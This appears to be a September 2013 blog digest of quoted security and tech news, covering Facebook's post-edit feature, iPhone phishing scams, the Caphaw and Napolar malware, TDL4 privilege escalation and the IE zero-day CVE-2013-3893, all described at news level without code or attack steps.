September, 2013:

Facebook has implemented a new EDIT feature (that offers audit trail) … Originally, posts were locked down so that likes or responses would be in line with original posts (primarily to prevent pranksters from changing content of message to the opposite meaning)

QUOTE: you’ve ever posted something on Facebook that you’ve immediately wanted to tweak or correct, Facebook has a solution for you. This week, the site announced that it would roll out a new feature for its web platform and Android Facebook app allowing users to edit posts and comments. Facebook, a lightning rod of privacy issues lately, has already addressed many people’s primary concern with this feature. Facebook will mark posts that have been edited and allow users to see a history of the changes made to the content. This will prevent users from being suckered into liking a post that is edited after the fact.

QUOTE: This week on Mobile Threat Monday, we look at two mobile issues related to Apple products—though, interestingly, one of them is on Android. The good news is that both of the two stories we’re highlighting today have already been solved, but the bad news is that they existed in the first place.

1. iMessage Chat — Apple’s iMessage is the system that allows users to send text messages to other iOS users over Wi-Fi or data network. It’s an appealing service since it’s free, automatic, and syncs with iMessage on OS X (and also can’t be read by the FBI, though that’s up for debate), but it does leave Android users out in the cold.

2. Mailbox JavaScript — Mailbox is the iOS email app that soft-launched with an enormous waiting list. Mailbox has been extremely popular on iOS and is now open to everyone. The app’s reputation took a bit of a hit last week when it was revealed that Mailbox would execute JavaScript in emails without the user’s permission. The issue was apparently discovered by several security watchdogs, though Michele Spagnuolo’s breakdown of the issue made headlines.

QUOTE: Apple unveiled details of its long-awaited new iPhone models this week, announcing the iPhone 5S and the iPhone 5C. While the impending September 20 release date for the phones has been a cause for celebration online, social media users should beware of fake offers for new iPhones cropping up on Facebook. In fact, as Trend Micro reports, these spam messages have already been appearing in users’ inboxes. The emails attempt to look like an Apple Store notification email and tells users that they’ve “won” the iPhone 5S plus an iPad. A link in the email then takes users to another website, where they’re asked to input their email address and password. So far, the scam has spread across southeastern Asia, though as the buzz around the new phones increases as the release date draws nearer, Facebook users around the world can expect to see more of these same kinds of scams.

QUOTE: Facebook is constantly seeking ways to better analyze its users’ posts and find ways to target its advertising and content. Last week, it was revealed that the site is investigating deep learning (i.e., artificial intelligence) techniques that can create a “simulated neural network” to better understand the emotions behind users’ posts and better sort their News Feed. The system is a massive network of interconnected computers intended to simulate the human brain with learning algorithms. “Research into understanding images, text, and language has been going on for decades, but the typical improvement a new technique might offer was a fraction of a percent,” Facebook’s chief technology officer, Mike Schroepfer, told the MIT Technology Review. “In tasks like vision or speech, we’re seeing 30 percent-plus improvements with deep learning… The data set is increasing in size, people are getting more friends, and with the advent of mobile, people are online more frequently.”

QUOTE: A stealthy banking Trojan known as Caphaw or Shylock has resurfaced – and is attacking customers of 24 American banks. It’s armed with defensive and stealth abilities including the power to “restore” itself during shutdown. The malware is described as “one of the few that can steal money while a user is accesing his bank acount,” by ESET Security Intelligence Team Lead, Aleksandr Matrosov, who published a detailed analysis of the malware this year.

“It is an interesting financial malware family: one of the few that has autoload functionality for automatically stealing money when the user is actively accessing his banking account. An infected user can’t recognize that his money is being stolen,” Matrosov writes. “This threat has many techniques for bypassing security software and evading automated malware samples processing.” Zscaler said in a blog post, “Over the last month, the ThreatLabZ researchers have been actively monitoring a recent uptick in the numbers of Win32/Caphaw (henceforward known as Caphaw) infections that have been actively targeting users’ bank accounts since 2011.

QUOTE: There is a new bot on the block. ESET identifies it as Win32/Napolar while its author calls it solarbot. This piece of malware came to our attention mid-August because of its interesting anti-debugging and code injection techniques. It recently attracted general attention when it was discussed on various reverse engineering forums. This malware can serve multiple purposes. The three main ones are to conduct Denial of Service attacks, to act as a SOCKS proxy server, and to steal information from infected systems. The malware is able to hook into various browsers to steal information that is submitted in web forms.

We have uncovered many details about this bot since it became active at the end of July, with in-the-wild infections starting mid-August. There have been reports of thousands of infections, many of them in South America. The countries with the most infections are Peru, Ecuador, and Columbia. More information on the geographical distribution for this threat can be found on virusradar. The author of Win32/Napolar uses a website to promote it. The website looks very professional and contains detailed information about the bot, including the cost ($200 USD for each build) and even a complete change-log of the evolution of the code. Although we have not yet directly seen Win32/Napolar being distributed in the wild, it seems likely that this threat has been spread through Facebook.

QUOTE: Last year, ESET mentioned a TDL4 variant (some AV vendors refer to it as Pihar) that employs new techniques to bypass HIPS as well as to elevate a process’s privileges to gain administrator access. The droppers of the variants we recently saw also use the same techniques mentioned in ESET’s blog post, but with some minor updates. TDL4 exploits the MS10-092 vulnerability in Microsoft Window’s Task Scheduler service to elevate the malware’s process privileges in order to load the rootkit driver. The new variants instead exploits the CVE-2013-3660 EPATHOBJ vulnerability discovered by security researcher Tavis Ormandy

The feature works when users decide to purchase or download an item via an ecommerce app, and add them to their shopping carts. At that point, if the user has uploaded their credit card information with Facebook via a Facebook Gift, credit or in-game purchase, they are presented with a button that allows them to autofill their financial info via Facebook. Facebook is essentially acting as a middle-man between users and the ecommerce businesses they’re purchasing from, but it could be the first step in a greater move by Facebook toward ecommerce technology of their own.

QUOTE: The Internet Storm Center is beginning to see increased evidence of exploits in the wild regarding Microsoft Security Advisory2887505. Accordingly, we’re moving the InfoCon up to Yellow. Microsoft is investigating public reports of a vulnerability in all supported versions of Internet Explorer. Microsoft is aware of targeted attacks that attempt to exploit this vulnerability in Internet Explorer 8 and Internet Explorer 9. Applying the Microsoft Fix it solution,CVE-2013-3893 Fix It Workaround, prevents the exploitation of this issue. This FixIt solution also includes EMET 4.0 guidance.

QUOTE: On September 17, Microsoft issued an advisory reporting a new zero-day vulnerability in Internet Explorer: Microsoft Internet Explorer Memory Corruption Vulnerability (CVE-2013-3893). The advisory states that the vulnerability may corrupt memory in a way that could allow attackers to execute arbitrary code. The attack works by enticing users to visit specially crafted websites that host the vulnerability through Internet Explorer. Microsoft also states that at this time the vulnerability is known to be exploited in only a limited number of targeted attacks. While Microsoft is yet to release a patch for this vulnerability, they have provided a temporary “Fix It” tool solution as a workaround until a security update is made available